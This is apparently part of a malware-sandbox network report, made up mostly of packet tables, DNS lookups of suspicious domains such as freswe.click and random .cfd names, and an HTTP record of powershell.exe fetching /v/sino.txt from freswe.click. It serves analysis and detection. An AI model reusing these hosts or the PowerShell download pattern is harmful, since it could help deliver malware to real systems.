                                        Jul 13, 2023 09:48:53.570887089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.570930958 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.570945978 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571022987 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571079016 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571126938 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571135998 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571181059 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571192026 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571250916 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571305990 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571355104 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571362019 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571407080 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571419001 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571475029 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571530104 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571576118 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571588039 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571631908 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571645021 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571702957 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571759939 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571804047 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571815968 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571858883 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.571875095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571930885 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.571988106 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572031021 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572041988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572082996 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572099924 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572158098 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572213888 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572277069 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572292089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572346926 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572354078 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572411060 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572468042 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572516918 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572525024 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572568893 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572582006 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572639942 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572695017 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572738886 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572751999 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572796106 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572808981 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572865009 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572921991 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.572972059 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.572977066 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573019981 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573031902 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573087931 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573143959 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573191881 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573199987 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573244095 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.573256016 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.573313951 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.576159000 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.751925945 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752007961 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752063990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752074003 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752136946 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752178907 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752219915 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752340078 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752387047 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752403975 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752484083 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752527952 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752563000 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752624035 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752665997 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752708912 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752788067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752829075 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752847910 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752907038 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.752948046 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.752966881 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753025055 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753078938 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753079891 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753138065 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753179073 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753197908 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753254890 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753295898 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753340006 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753401995 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753442049 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753458977 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753516912 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753556967 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753596067 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753669024 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753710032 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753726959 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753787041 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753828049 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753845930 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753904104 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.753945112 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.753962040 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754019022 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754065990 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754079103 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754138947 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754187107 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754198074 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754255056 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754296064 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754312992 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754374981 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754456997 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754503965 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754514933 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754555941 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754575014 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754633904 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754714966 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754760027 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754781008 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754833937 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754838943 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754894018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.754933119 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.754949093 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755007982 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755048037 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.755064964 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755125046 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.755163908 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.933954954 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934072018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934134960 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934201002 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934235096 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934262991 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934289932 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934328079 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934386015 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934410095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934498072 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934556007 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934592962 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934653044 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934705973 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934711933 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934771061 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934825897 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934828997 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934887886 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.934940100 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.934946060 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935007095 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935065031 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935066938 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935146093 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935214996 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935220003 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935278893 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935337067 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935339928 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935400963 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935472965 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935477018 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935559988 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935620070 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935647011 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935710907 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935767889 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935774088 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935825109 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935883999 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935892105 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.935942888 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.935997963 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.936003923 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936062098 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936120033 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936132908 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.936181068 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936242104 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936250925 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.936345100 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936407089 CEST8049698188.166.220.201192.168.2.3
                                        Jul 13, 2023 09:48:53.936424017 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:53.978635073 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:48:54.391406059 CEST4969880192.168.2.3188.166.220.201
                                        Jul 13, 2023 09:49:57.358875990 CEST4969980192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:49:57.463865995 CEST8049699209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:49:57.968518972 CEST4969980192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:49:58.075308084 CEST8049699209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:49:58.578071117 CEST4969980192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:49:58.684679031 CEST8049699209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:50:01.218028069 CEST4970080192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:50:01.321765900 CEST8049700209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:50:01.828206062 CEST4970080192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:50:01.931895018 CEST8049700209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:50:02.438678980 CEST4970080192.168.2.3209.142.66.216
                                        Jul 13, 2023 09:50:02.541764021 CEST8049700209.142.66.216192.168.2.3
                                        Jul 13, 2023 09:50:17.714644909 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.733730078 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:17.733917952 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.734031916 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.753683090 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:17.770692110 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:17.770731926 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:17.770955086 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.770988941 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.788444042 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:17.788569927 CEST4970180192.168.2.376.223.105.230
                                        Jul 13, 2023 09:50:17.790591002 CEST804970176.223.105.230192.168.2.3
                                        Jul 13, 2023 09:50:39.348455906 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.367269039 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.367382050 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.367477894 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.386153936 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.839054108 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.839086056 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.839114904 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.839350939 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.839432955 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.843477011 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:50:39.853849888 CEST804970299.83.196.71192.168.2.3
                                        Jul 13, 2023 09:50:39.853950977 CEST4970280192.168.2.399.83.196.71
                                        Jul 13, 2023 09:51:21.149506092 CEST4970380192.168.2.3185.53.179.91
                                        Jul 13, 2023 09:51:21.176090002 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:51:21.176275969 CEST4970380192.168.2.3185.53.179.91
                                        Jul 13, 2023 09:51:21.202933073 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:51:21.203156948 CEST4970380192.168.2.3185.53.179.91
                                        Jul 13, 2023 09:51:21.229820967 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:51:21.229859114 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:51:21.229877949 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:51:21.230110884 CEST4970380192.168.2.3185.53.179.91
                                        Jul 13, 2023 09:51:21.231086016 CEST4970380192.168.2.3185.53.179.91
                                        Jul 13, 2023 09:51:21.257193089 CEST8049703185.53.179.91192.168.2.3
                                        Jul 13, 2023 09:52:26.690104961 CEST4970480192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:26.959342003 CEST8049704150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:26.959469080 CEST4970480192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:26.959572077 CEST4970480192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:27.227514029 CEST8049704150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:27.227644920 CEST8049704150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:27.227694988 CEST8049704150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:27.227845907 CEST4970480192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:27.227889061 CEST4970480192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:27.495975971 CEST8049704150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:47.689313889 CEST4970580192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:47.968192101 CEST8049705150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:47.968420982 CEST4970580192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:47.968513966 CEST4970580192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:48.247200966 CEST8049705150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:48.247250080 CEST8049705150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:48.247268915 CEST8049705150.95.255.38192.168.2.3
                                        Jul 13, 2023 09:52:48.247454882 CEST4970580192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:48.247497082 CEST4970580192.168.2.3150.95.255.38
                                        Jul 13, 2023 09:52:48.526334047 CEST8049705150.95.255.38192.168.2.3

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 13, 2023 09:48:52.429908037 CEST5692453192.168.2.38.8.8.8
                                        Jul 13, 2023 09:48:52.485021114 CEST53569248.8.8.8192.168.2.3
                                        Jul 13, 2023 09:49:56.655205965 CEST6062553192.168.2.38.8.8.8
                                        Jul 13, 2023 09:49:57.353049994 CEST53606258.8.8.8192.168.2.3
                                        Jul 13, 2023 09:50:01.154997110 CEST4930253192.168.2.38.8.8.8
                                        Jul 13, 2023 09:50:01.183917046 CEST53493028.8.8.8192.168.2.3
                                        Jul 13, 2023 09:50:17.659744978 CEST5397553192.168.2.38.8.8.8
                                        Jul 13, 2023 09:50:17.713550091 CEST53539758.8.8.8192.168.2.3
                                        Jul 13, 2023 09:50:39.038078070 CEST5113953192.168.2.38.8.8.8
                                        Jul 13, 2023 09:50:39.345611095 CEST53511398.8.8.8192.168.2.3
                                        Jul 13, 2023 09:51:21.069185019 CEST5295553192.168.2.38.8.8.8
                                        Jul 13, 2023 09:51:21.146644115 CEST53529558.8.8.8192.168.2.3
                                        Jul 13, 2023 09:51:44.267841101 CEST6058253192.168.2.38.8.8.8
                                        Jul 13, 2023 09:51:44.571615934 CEST53605828.8.8.8192.168.2.3
                                        Jul 13, 2023 09:52:04.736326933 CEST5713453192.168.2.38.8.8.8
                                        Jul 13, 2023 09:52:05.012703896 CEST53571348.8.8.8192.168.2.3
                                        Jul 13, 2023 09:52:26.381526947 CEST6205053192.168.2.38.8.8.8
                                        Jul 13, 2023 09:52:26.689048052 CEST53620508.8.8.8192.168.2.3
                                        Jul 13, 2023 09:52:47.396116018 CEST5604253192.168.2.38.8.8.8
                                        Jul 13, 2023 09:52:47.686402082 CEST53560428.8.8.8192.168.2.3

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Jul 13, 2023 09:48:52.429908037 CEST192.168.2.38.8.8.80xd5d6Standard query (0)freswe.clickA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:49:56.655205965 CEST192.168.2.38.8.8.80x46ebStandard query (0)www.electorhome.comA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:01.154997110 CEST192.168.2.38.8.8.80x1a86Standard query (0)www.electorhome.comA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:17.659744978 CEST192.168.2.38.8.8.80xcd38Standard query (0)www.apinspect.netA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:39.038078070 CEST192.168.2.38.8.8.80xb1f1Standard query (0)www.baroevent.comA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:51:21.069185019 CEST192.168.2.38.8.8.80xf7faStandard query (0)www.hyperpigmentation-91528.bondA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:51:44.267841101 CEST192.168.2.38.8.8.80xaa27Standard query (0)www.rixiojjl.cfdA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:04.736326933 CEST192.168.2.38.8.8.80x5b86Standard query (0)www.krmq9w.cfdA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:26.381526947 CEST192.168.2.38.8.8.80xb7a1Standard query (0)www.qsmdrkjw.cfdA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:47.396116018 CEST192.168.2.38.8.8.80x693Standard query (0)www.lajzznhk.cfdA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Jul 13, 2023 09:48:52.485021114 CEST8.8.8.8192.168.2.30xd5d6No error (0)freswe.click188.166.220.201A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:49:57.353049994 CEST8.8.8.8192.168.2.30x46ebNo error (0)www.electorhome.comelectorhome.comCNAME (Canonical name)IN (0x0001)false
                                        Jul 13, 2023 09:49:57.353049994 CEST8.8.8.8192.168.2.30x46ebNo error (0)electorhome.com209.142.66.216A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:01.183917046 CEST8.8.8.8192.168.2.30x1a86No error (0)www.electorhome.comelectorhome.comCNAME (Canonical name)IN (0x0001)false
                                        Jul 13, 2023 09:50:01.183917046 CEST8.8.8.8192.168.2.30x1a86No error (0)electorhome.com209.142.66.216A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:17.713550091 CEST8.8.8.8192.168.2.30xcd38No error (0)www.apinspect.netapinspect.netCNAME (Canonical name)IN (0x0001)false
                                        Jul 13, 2023 09:50:17.713550091 CEST8.8.8.8192.168.2.30xcd38No error (0)apinspect.net76.223.105.230A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:17.713550091 CEST8.8.8.8192.168.2.30xcd38No error (0)apinspect.net13.248.243.5A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:39.345611095 CEST8.8.8.8192.168.2.30xb1f1No error (0)www.baroevent.combaroevent.comCNAME (Canonical name)IN (0x0001)false
                                        Jul 13, 2023 09:50:39.345611095 CEST8.8.8.8192.168.2.30xb1f1No error (0)baroevent.com99.83.196.71A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:50:39.345611095 CEST8.8.8.8192.168.2.30xb1f1No error (0)baroevent.com75.2.85.42A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:51:21.146644115 CEST8.8.8.8192.168.2.30xf7faNo error (0)www.hyperpigmentation-91528.bond185.53.179.91A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:51:44.571615934 CEST8.8.8.8192.168.2.30xaa27Name error (3)www.rixiojjl.cfdnonenoneA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:05.012703896 CEST8.8.8.8192.168.2.30x5b86Name error (3)www.krmq9w.cfdnonenoneA (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:26.689048052 CEST8.8.8.8192.168.2.30xb7a1No error (0)www.qsmdrkjw.cfd150.95.255.38A (IP address)IN (0x0001)false
                                        Jul 13, 2023 09:52:47.686402082 CEST8.8.8.8192.168.2.30x693No error (0)www.lajzznhk.cfd150.95.255.38A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • freswe.click
                                        • www.apinspect.net
                                        • www.baroevent.com
                                        • www.hyperpigmentation-91528.bond
                                        • www.qsmdrkjw.cfd
                                        • www.lajzznhk.cfd

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.349698188.166.220.20180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 13, 2023 09:48:52.676951885 CEST0OUTGET /v/sino.txt HTTP/1.1
                                        Host: freswe.click
